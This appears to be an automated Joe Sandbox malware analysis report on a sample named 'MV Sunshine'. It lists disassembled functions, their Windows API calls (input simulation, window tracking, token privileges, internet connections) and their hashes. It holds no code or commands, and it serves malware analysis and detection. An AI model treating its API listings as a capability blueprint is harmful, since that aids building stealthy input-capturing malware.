API String ID: 432972143-0
Opcode ID: d35ef69e6d9b873211720b2d399e57e51e95bc0ed4139fd0f01043d5ea0837eb
Instruction ID: 1c03d8ea19fc99cba6dd95861883cc15e0ee8bf8566133d83b5a49857ea6a80a
Opcode Fuzzy Hash: d35ef69e6d9b873211720b2d399e57e51e95bc0ed4139fd0f01043d5ea0837eb
Instruction Fuzzy Hash: 93315E30E40688AEFF30AB658C05BF9BBAFAF47310F04431AE5845A2D1CB7549C79765

Function 00681121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00681176
SetKeyboardState.USER32(00000080,?,00008000), ref: 00681192
PostMessageW.USER32(00000000,00000101,00000000), ref: 006811F1
SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00681243

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 82280112bbcd50b9b61a3cdfc4e0c505c7f54c82ddb0a02b42ab5f679a62c1ae
Instruction ID: 92faf007fa7fc917c839955b6d6f57f39ee8fce2469739da2b6aeaa019f4ab6f
Opcode Fuzzy Hash: 82280112bbcd50b9b61a3cdfc4e0c505c7f54c82ddb0a02b42ab5f679a62c1ae
Instruction Fuzzy Hash: C3314870D402089AFF30ABA58C187FA7BAFAB4B310F04431EE5D09A6D1C3755A868751

Function 00656415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0065644B
__isleadbyte_l.LIBCMT ref: 00656479
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 006564A7
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 006564DD

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 87f3898fd5a902eddace41062cbf5f1e29fa7defa3d3275de0ef06de65df38c2
Instruction ID: fb0761a4bb430b6307bf01819bfea225728339cec3aededf24c1913b8fcf876e
Opcode Fuzzy Hash: 87f3898fd5a902eddace41062cbf5f1e29fa7defa3d3275de0ef06de65df38c2
Instruction Fuzzy Hash: 8C31D031600246AFDB218F74C844BAA7BE7FF41312F558129FC54872A0E731EC99DB90

Function 006A5175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 006A5189

Part of subcall function 0068387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00683897
Part of subcall function 0068387D: GetCurrentThreadId.KERNEL32 ref: 0068389E
Part of subcall function 0068387D: AttachThreadInput.USER32(00000000,?,006852A7), ref: 006838A5

GetCaretPos.USER32(?), ref: 006A519A
ClientToScreen.USER32(00000000,?), ref: 006A51D5
GetForegroundWindow.USER32 ref: 006A51DB

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 069aab16567c087a0a53b46120172a4e8c90a7fa8168075ef9e0b9879b2df045
Instruction ID: 7f4b307768031b5562030ac1a3bcafa29e158da21400b116b8ce4b9a732f0710
Opcode Fuzzy Hash: 069aab16567c087a0a53b46120172a4e8c90a7fa8168075ef9e0b9879b2df045
Instruction Fuzzy Hash: CA314C71D00218AFCB40EFA5D8859EFB7FAEF98300F10406AE405E7201EA75AE01CFA4

Function 006AC788 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00622612: GetWindowLongW.USER32(?,000000EB), ref: 00622623

GetCursorPos.USER32(?), ref: 006AC7C2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0065BBFB,?,?,?,?,?), ref: 006AC7D7
GetCursorPos.USER32(?), ref: 006AC824
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0065BBFB,?,?,?), ref: 006AC85E

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 27dbed04f96ac29366413c853c9e084061cb33e6f42c5f9e34551fdd18fc4f9a
Instruction ID: 0146f77baef73142ca382f0ff72ae4fa91ac148408e21a489bd1d737cf2153c3
Opcode Fuzzy Hash: 27dbed04f96ac29366413c853c9e084061cb33e6f42c5f9e34551fdd18fc4f9a
Instruction Fuzzy Hash: 84317335500118AFCB15DF58C898EEA7FBBFB4A720F044069F9058B261D7359D51DF60

Function 00640BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00640BF2

Part of subcall function 00625B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00687B20,?,?,00000000), ref: 00625B8C
Part of subcall function 00625B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00687B20,?,?,00000000,?,?), ref: 00625BB0

_fprintf.LIBCMT ref: 00640C29
OutputDebugStringW.KERNEL32(?), ref: 00676331

Part of subcall function 00644CDA: _flsall.LIBCMT ref: 00644CF3

__setmode.LIBCMT ref: 00640C5E

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: 54c08c2c2704a24f1a6343ba353ab67e16cddc92d22aed27ae06ec50fb912533
Instruction ID: 864caf31ed017a411041d2e8d84255fa1243e1c6f270b5b4f1f604e2a57b724c
Opcode Fuzzy Hash: 54c08c2c2704a24f1a6343ba353ab67e16cddc92d22aed27ae06ec50fb912533
Instruction Fuzzy Hash: 73113632A04614BEEB44B3B4AC83AFE7B6B9F41320F14411EF20457192DE315D8297A9

Function 00678B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00678652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00678669
Part of subcall function 00678652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00678673
Part of subcall function 00678652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00678682
Part of subcall function 00678652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00678689
Part of subcall function 00678652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0067869F

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00678BEB
_memcmp.LIBCMT ref: 00678C0E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00678C44
HeapFree.KERNEL32(00000000), ref: 00678C4B

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 4ebf5dc70de62a0e60365196ef555fc1c246b0ac8ecbfd4c0ea01ade1e1daa93
Instruction ID: a17f5b103341faca6717fb756171c59c48e2a760143937bb50b3bba4bc2c481c
Opcode Fuzzy Hash: 4ebf5dc70de62a0e60365196ef555fc1c246b0ac8ecbfd4c0ea01ade1e1daa93
Instruction Fuzzy Hash: D1219071E81208EFDB10DFA4C949BEEB7BAEF44354F158099E458A7240DB31AE46CF61

Function 00691A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00691A97

Part of subcall function 00691B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00691B40
Part of subcall function 00691B21: InternetCloseHandle.WININET(00000000), ref: 00691BDD

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: a2e8b67f0ac1252791dd254a04fe36224603c993fe1627e133e63c66c56381e3
Instruction ID: 5822ac217d6c1971665624877c0f31be43c916fdc219ef5a962f1419bcaf4593
Opcode Fuzzy Hash: a2e8b67f0ac1252791dd254a04fe36224603c993fe1627e133e63c66c56381e3
Instruction Fuzzy Hash: EA21A435200606BFDF119FA0DC01FBAB7AFFF46701F20401AF9119AA55E771E8119B94

Function 0067E1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0067F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0067E1C4,?,?,?,0067EFB7,00000000,000000EF,00000119,?,?), ref: 0067F5BC
Part of subcall function 0067F5AD: lstrcpyW.KERNEL32(00000000,?,?,0067E1C4,?,?,?,0067EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0067F5E2
Part of subcall function 0067F5AD: lstrcmpiW.KERNEL32(00000000,?,0067E1C4,?,?,?,0067EFB7,00000000,000000EF,00000119,?,?), ref: 0067F613

lstrlenW.KERNEL32(?,00000002,?,?,?,?,0067EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0067E1DD
lstrcpyW.KERNEL32(00000000,?,?,0067EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0067E203
lstrcmpiW.KERNEL32(00000002,cdecl,?,0067EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0067E237

Strings

cdecl, xrefs: 0067E22E

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: c32b78dd11082eb68eaa6c07cff0956a2a6d0f80765382455d41b70fdb1ca922
Instruction ID: ad3d7be27a1f815bcb8f68b0fa5cc2649ad23048c0c9ce3d7f6afba41b8f0025
Opcode Fuzzy Hash: c32b78dd11082eb68eaa6c07cff0956a2a6d0f80765382455d41b70fdb1ca922
Instruction Fuzzy Hash: 72110336200301EFCB24AF74DC05D7A77AAFF49310B40806AF81ACB251EB72A954C7A1

Function 00655332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00655351

Part of subcall function 0064594C: __FF_MSGBANNER.LIBCMT ref: 00645963
Part of subcall function 0064594C: __NMSG_WRITE.LIBCMT ref: 0064596A
Part of subcall function 0064594C: RtlAllocateHeap.NTDLL(00BC0000,00000000,00000001,00000000,?,?,?,00641013,?), ref: 0064598F

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 53383a406569909688bf7a8262056b77581233292aa09cbe3b803a6303a37da5
Instruction ID: 0acdd2b7644313420c53923fcf384620ecb8031a725e153a6455407125ff8fb3
Opcode Fuzzy Hash: 53383a406569909688bf7a8262056b77581233292aa09cbe3b803a6303a37da5
Instruction Fuzzy Hash: 7F110432805B15AFCF203F70E86969D37975F013E2F10042DFD0A9A291EE7189459694

Function 00624531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00624560

Part of subcall function 0062410D: _memset.LIBCMT ref: 0062418D
Part of subcall function 0062410D: _wcscpy.LIBCMT ref: 006241E1
Part of subcall function 0062410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 006241F1

KillTimer.USER32(?,00000001,?,?), ref: 006245B5
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 006245C4
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0065D6CE

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 971bb85744f873078909ba79025d06c78eb5e6416dee3cbf43252733ecfda3bc
Instruction ID: 326e0e20724f3ce98e5fc227e296a185d6ca2a8d07e832e381db4c5840f6180f
Opcode Fuzzy Hash: 971bb85744f873078909ba79025d06c78eb5e6416dee3cbf43252733ecfda3bc
Instruction Fuzzy Hash: C5212970904794AFEB328B24DC45BE7BBEE9F01305F00009DE6DE66291C7B45A89CF51

Function 006840B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 006840D1
_memset.LIBCMT ref: 006840F2
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00684144
CloseHandle.KERNEL32(00000000), ref: 0068414D

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: 75e32246b09361c2af7867710aa6ed59c7fbe4bcd5961043b1d62e3abe6d7e1b
Instruction ID: 699e8da8a94ddedb1d08d23ba9227935619d2b7c6b3865821660db9edb14834c
Opcode Fuzzy Hash: 75e32246b09361c2af7867710aa6ed59c7fbe4bcd5961043b1d62e3abe6d7e1b
Instruction Fuzzy Hash: 85110D759012287AD7306BA59C4DFEBBB7DEF45760F10429AF908D7280D6744F80CBA4

Function 0069667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00625B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00687B20,?,?,00000000), ref: 00625B8C
Part of subcall function 00625B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00687B20,?,?,00000000,?,?), ref: 00625BB0

gethostbyname.WSOCK32(?,?,?), ref: 006966AC
WSAGetLastError.WSOCK32(00000000), ref: 006966B7
_memmove.LIBCMT ref: 006966E4
inet_ntoa.WSOCK32(?), ref: 006966EF

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: 594db7521bc34ae83a2e7496e8eda0f9ed7e5a07537cd9461919206ba4ba1f4a
Instruction ID: 01124a8545b04b42100e989801820a682705ee267660b5dd575d545c063769de
Opcode Fuzzy Hash: 594db7521bc34ae83a2e7496e8eda0f9ed7e5a07537cd9461919206ba4ba1f4a
Instruction Fuzzy Hash: B9115135500505AFCF40FBA4ED96DEEB7BAAF45311B144069F506A7161DF30AE04CF65

Function 00679023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00679043
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00679055
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0067906B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00679086

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 4ab21975033981825207686894a728092c408b234f743c87b844e45771c01233
Instruction ID: 1706a5f795ff0c07b093743bb1edd3ec63129a0afc46aed3dcab940213cf933b
Opcode Fuzzy Hash: 4ab21975033981825207686894a728092c408b234f743c87b844e45771c01233
Instruction Fuzzy Hash: ED115E79900218FFDB10DFA5CC85EDDBBB9FB48310F204095E904B7250D6716E10DBA4

Function 00621290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00622612: GetWindowLongW.USER32(?,000000EB), ref: 00622623

DefDlgProcW.USER32(?,00000020,?), ref: 006212D8
GetClientRect.USER32(?,?), ref: 0065B84B
GetCursorPos.USER32(?), ref: 0065B855
ScreenToClient.USER32(?,?), ref: 0065B860

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 8e51bd4cc5522cfee8d5d3a26685e2b52caada002ce431f5957fd3b46a8d156b
Instruction ID: 1332c17e4bcb6b64e9c8bd1b44f565744b6d9ed152ff8acbbcc929eb795199b0
Opcode Fuzzy Hash: 8e51bd4cc5522cfee8d5d3a26685e2b52caada002ce431f5957fd3b46a8d156b
Instruction Fuzzy Hash: DD116A35905429EFCB10EFA4E8859EE77BAEB16300F000456F901EB241C730BA918FAA

Function 00681652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,006801FD,?,00681250,?,00008000), ref: 0068166F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,006801FD,?,00681250,?,00008000), ref: 00681694
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,006801FD,?,00681250,?,00008000), ref: 0068169E
Sleep.KERNEL32(?,?,?,?,?,?,?,006801FD,?,00681250,?,00008000), ref: 006816D1

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 655e36c6e5b244a1cdd8497cf2000e4f867185068e99ea3afc9a4c48aa662e2b
Instruction ID: eaf35876294f091c5a51978bcd761afa5aea70da90c6d8a38e952af35a57bc32
Opcode Fuzzy Hash: 655e36c6e5b244a1cdd8497cf2000e4f867185068e99ea3afc9a4c48aa662e2b
Instruction Fuzzy Hash: EE118E31C0052CD7CF00AFE5D848AEEBB7EFF0A711F154159E980BA240DB3169A28B96

Function 00657207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0065722B

Part of subcall function 00657912: __fltout2.LIBCMT ref: 0065793B

__cftog_l.LIBCMT ref: 00657251
__cftoe_l.LIBCMT ref: 00657283

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 302a784b98241f02aed2a0fe89107141c5ba1a2f1e6b7ebd87b4d150909a83da
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 7D01803204414ABBCF525E84EC01CEE3F23BF19342F088515FE1858131C237CAB9AB81

